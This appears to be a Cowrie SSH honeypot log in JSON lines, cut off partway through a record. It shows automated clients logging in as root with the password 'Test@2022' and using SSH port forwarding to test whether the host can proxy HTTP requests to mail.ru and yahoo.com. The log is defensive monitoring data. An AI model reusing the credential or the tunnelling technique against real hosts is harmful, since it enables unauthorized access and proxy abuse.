{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:36.638868Z","src_ip":"77.83.207.83","session":"ef6febf8023f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:36.894540Z","src_ip":"77.83.207.83","session":"ef6febf8023f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2547,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:2547","sensor":"my-vps","timestamp":"2025-08-31T03:44:36.946702Z","session":"ef6febf8023f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:36.998008Z","src_ip":"77.83.207.83","session":"ef6febf8023f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":9417,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:9417","sensor":"my-vps","timestamp":"2025-08-31T03:44:37.141857Z","session":"ef6febf8023f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:37.193392Z","src_ip":"77.83.207.83","session":"ef6febf8023f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":30762,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:30762","sensor":"my-vps","timestamp":"2025-08-31T03:44:37.337722Z","session":"ef6febf8023f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:37.388963Z","src_ip":"77.83.207.83","session":"ef6febf8023f"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:37.441387Z","src_ip":"77.83.207.83","session":"ef6febf8023f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43866,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8ae14a067ec","protocol":"ssh","message":"New connection: 77.83.207.83:43866 (1.2.3.4:22) [session: c8ae14a067ec]","sensor":"my-vps","timestamp":"2025-08-31T03:44:37.491149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:37.492292Z","src_ip":"77.83.207.83","session":"c8ae14a067ec"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:37.542683Z","src_ip":"77.83.207.83","session":"c8ae14a067ec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:37.792208Z","src_ip":"77.83.207.83","session":"c8ae14a067ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25548,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:25548","sensor":"my-vps","timestamp":"2025-08-31T03:44:37.843229Z","session":"c8ae14a067ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:37.893609Z","src_ip":"77.83.207.83","session":"c8ae14a067ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":1038,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:1038","sensor":"my-vps","timestamp":"2025-08-31T03:44:38.036455Z","session":"c8ae14a067ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:38.087330Z","src_ip":"77.83.207.83","session":"c8ae14a067ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":11988,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:11988","sensor":"my-vps","timestamp":"2025-08-31T03:44:38.228395Z","session":"c8ae14a067ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:38.278566Z","src_ip":"77.83.207.83","session":"c8ae14a067ec"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:38.329581Z","src_ip":"77.83.207.83","session":"c8ae14a067ec"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43954,"dst_ip":"1.2.3.4","dst_port":22,"session":"9902c493b2dc","protocol":"ssh","message":"New connection: 77.83.207.83:43954 (1.2.3.4:22) [session: 9902c493b2dc]","sensor":"my-vps","timestamp":"2025-08-31T03:44:38.378997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:38.380198Z","src_ip":"77.83.207.83","session":"9902c493b2dc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:38.430949Z","src_ip":"77.83.207.83","session":"9902c493b2dc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:38.682998Z","src_ip":"77.83.207.83","session":"9902c493b2dc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5207,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:5207","sensor":"my-vps","timestamp":"2025-08-31T03:44:38.734456Z","session":"9902c493b2dc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:38.784871Z","src_ip":"77.83.207.83","session":"9902c493b2dc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":2925,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:2925","sensor":"my-vps","timestamp":"2025-08-31T03:44:38.928768Z","session":"9902c493b2dc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:38.979208Z","src_ip":"77.83.207.83","session":"9902c493b2dc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":3347,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:3347","sensor":"my-vps","timestamp":"2025-08-31T03:44:39.120816Z","session":"9902c493b2dc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:39.171325Z","src_ip":"77.83.207.83","session":"9902c493b2dc"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:39.222766Z","src_ip":"77.83.207.83","session":"9902c493b2dc"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44044,"dst_ip":"1.2.3.4","dst_port":22,"session":"e993f4e6d1b8","protocol":"ssh","message":"New connection: 77.83.207.83:44044 (1.2.3.4:22) [session: e993f4e6d1b8]","sensor":"my-vps","timestamp":"2025-08-31T03:44:39.271888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:39.272599Z","src_ip":"77.83.207.83","session":"e993f4e6d1b8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:39.323045Z","src_ip":"77.83.207.83","session":"e993f4e6d1b8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:39.573491Z","src_ip":"77.83.207.83","session":"e993f4e6d1b8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16701,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:16701","sensor":"my-vps","timestamp":"2025-08-31T03:44:39.624696Z","session":"e993f4e6d1b8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:39.675327Z","src_ip":"77.83.207.83","session":"e993f4e6d1b8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":20285,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:20285","sensor":"my-vps","timestamp":"2025-08-31T03:44:39.816542Z","session":"e993f4e6d1b8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:39.866755Z","src_ip":"77.83.207.83","session":"e993f4e6d1b8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":30267,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:30267","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.008748Z","session":"e993f4e6d1b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40708,"dst_ip":"1.2.3.4","dst_port":22,"session":"e92fe1a8dbac","protocol":"ssh","message":"New connection: 212.227.235.229:40708 (1.2.3.4:22) [session: e92fe1a8dbac]","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.034431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.040739Z","src_ip":"212.227.235.229","session":"e92fe1a8dbac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.059105Z","src_ip":"77.83.207.83","session":"e993f4e6d1b8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.110162Z","src_ip":"77.83.207.83","session":"e993f4e6d1b8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.132737Z","src_ip":"212.227.235.229","session":"e92fe1a8dbac"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44135,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0c38d6e6748","protocol":"ssh","message":"New connection: 77.83.207.83:44135 (1.2.3.4:22) [session: d0c38d6e6748]","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.158381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.159358Z","src_ip":"77.83.207.83","session":"d0c38d6e6748"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-